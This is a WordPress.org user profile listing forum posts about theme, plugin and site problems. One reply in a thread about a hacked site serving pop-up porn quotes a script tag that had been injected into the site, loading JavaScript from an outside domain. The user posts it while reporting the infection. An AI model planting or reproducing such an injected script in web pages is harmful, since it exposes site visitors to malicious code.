WordPress.org

Profiles

vuhoops

Profile picture of vuhoops
  • Member Since: June 18th, 2008
  • @vuhoops on WordPress.org
  • Find me on:

  • Created a topic, Index.php "Causing heavy load", on the site WordPress Support Forums

    5 years ago

  • Posted a reply to Site not displaying on iPad, on the site WordPress Support Forums:
    hmmm... Is it that weird? Or did I mess something up. :)

    5 years ago

  • Posted a reply to Site not displaying on iPad, on the site WordPress Support Forums:
    This issue is happening across ALL themes. Here is a screenshot of what my visitors…

    5 years ago

  • Created a topic, Site not displaying on iPad, on the site WordPress Support Forums

    5 years ago

  • Posted a reply to Possible Virus? Users are getting a pop-up porn message, on the site WordPress Support Forums:
    I just wanted to thank everyone for their help and support. I was able to…

    5 years ago

  • Posted a reply to [Plugin: Facebook Comments for WordPress] This Plugin Requires an href Parameter, on the site WordPress Support Forums:
    Regarding the error- do you have a Facebook Like Widget going too? I got this…

    5 years ago

  • Posted a reply to Possible Virus? Users are getting a pop-up porn message, on the site WordPress Support Forums:
    the XMLPRC is yielding this if it helps... XML-RPC server accepts POST requests only.<script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script>

    5 years ago

  • Posted a reply to Possible Virus? Users are getting a pop-up porn message, on the site WordPress Support Forums:
    Ok, so I've actually gone w/ a complete new installation and new db. and restored…

    5 years ago

  • Posted a reply to Possible Virus? Users are getting a pop-up porn message, on the site WordPress Support Forums:
    Thank you Fitting sites. I'm affraid I am way in over my head now. :(

    5 years ago

  • Posted a reply to Possible Virus? Users are getting a pop-up porn message, on the site WordPress Support Forums:
    Crud, now my site is simply forwarding to http://vuhoops.com/wp-admin/install.php

    5 years ago

  • Created a topic, Possible Virus? Users are getting a pop-up porn message, on the site WordPress Support Forums

    5 years ago

  • Created a topic, Basic Side Column Widget Width Question, on the site WordPress Support Forums

    6 years ago

  • Posted a reply to Visual edit tab does not work, on the site WordPress Support Forums:
    I just wanted to thank folks in this thread. it just helped me tons.

    6 years ago

  • Created a topic, Moving Sidebar from right to left, on the site WordPress Support Forums

    7 years ago

  • Posted a reply to change content of new comment email, on the site WordPress Support Forums:
    I would love to know where this is edited to, but for other reasons.

    7 years ago

  • Created a topic, Different Themes... Different Commenting Systems?, on the site WordPress Support Forums

    7 years ago

  • Posted a reply to [Plugin: KB Advanced RSS Widget] Formatting Options not saving, on the site WordPress Support Forums:
    Hmmm... no one has the same issue?

    7 years ago

  • Posted a reply to [Plugin: KB Advanced RSS Widget] Formatting Options not saving, on the site WordPress Support Forums:
    YES. This has been driving me crazy for the past few weeks too! I want…

    8 years ago

  • Posted a reply to Formatting Caption Text, on the site WordPress Support Forums:
    Perfect. Thank you for your help!

    8 years ago

  • Created a topic, Formatting Caption Text, on the site WordPress Support Forums

    8 years ago

  • Created a topic, Column Width Help, on the site WordPress Support Forums

    8 years ago

  • Created a topic, Forbidden: No Access to post.php, on the site WordPress Support Forums

    8 years ago

  • Posted a reply to Different template per page, on the site WordPress Support Forums:
    @asrai, THANK YOU. That just helped me so much!

    8 years ago

  • Posted a reply to Border Around Header Image, on the site WordPress Support Forums:
    Thank you design_dolphin!

    8 years ago

  • Created a topic, Border Around Header Image, on the site WordPress Support Forums

    8 years ago

  • Posted a reply to [Plugin: WP-Table] Need a fix for 2.5 compatability, on the site WordPress Support Forums:
    Can I just thank the folks who suggested deactivating cforms. Worked like a charm!

    8 years ago

  • Posted a reply to [Revolution Theme] Images aren't Aligning, on the site WordPress Support Forums:
    The answer is here if anyone needs this in the future...

    8 years ago

  • Created a topic, [Revolution Theme] Images aren't Aligning, on the site WordPress Support Forums

    8 years ago

  • Posted a reply to [Plugin: Sociable] Eliminating the Hover, on the site WordPress Support Forums:
    Thanks SteveSmith.

    8 years ago

  • Posted a reply to Elimintating the Hover in Sociable plugin, on the site WordPress Support Forums:
    Thanks so much SteveSmith1983! That did it.

    8 years ago

  • Created a topic, Elimintating the Hover in Sociable plugin, on the site WordPress Support Forums

    8 years ago

  • Created a topic, [Plugin: Sociable] Eliminating the Hover, on the site WordPress Support Forums

    8 years ago

  • Posted a reply to Activating Plugin leads to 404 Error, on the site WordPress Support Forums:
    Am I completely helpless on this one?

    8 years ago

  • Posted a reply to Activating Plugin leads to 404 Error, on the site WordPress Support Forums:
    I had a fear this was a bigger deal than I thought.

    8 years ago

  • Created a topic, Activating Plugin leads to 404 Error, on the site WordPress Support Forums

    8 years ago

  • Posted a reply to Activating Plugin leads to 404 Error, on the site WordPress Support Forums:
    This is a weird one, huh?

    8 years ago

  • Created a topic, Activating Plugin leads to 404 Error, on the site WordPress Support Forums

    8 years ago

  • Posted a reply to [Plugin: NextGEN Gallery] [Plugin: NextGen Gallery] Thumbnail Memory Limit, on the site WordPress Support Forums:
    Same here... This is when uploading by .zip When I upload an individual file, it…

    8 years ago

  • Posted a reply to wp-print plugin, on the site WordPress Support Forums:
    Thanks whoami... those files were loaded in a wp-print/print folder as it came in the…

    8 years ago

  • Posted a reply to wp-print plugin, on the site WordPress Support Forums:
    thanks for the help GamerZ. I must be dense, b/c I don't see anything under…

    8 years ago

  • Posted a reply to wp-print plugin, on the site WordPress Support Forums:
    I'm having an issue w/ WP-Print. I'm on WP 2.3.3, and initially installed WP-Print for…

    8 years ago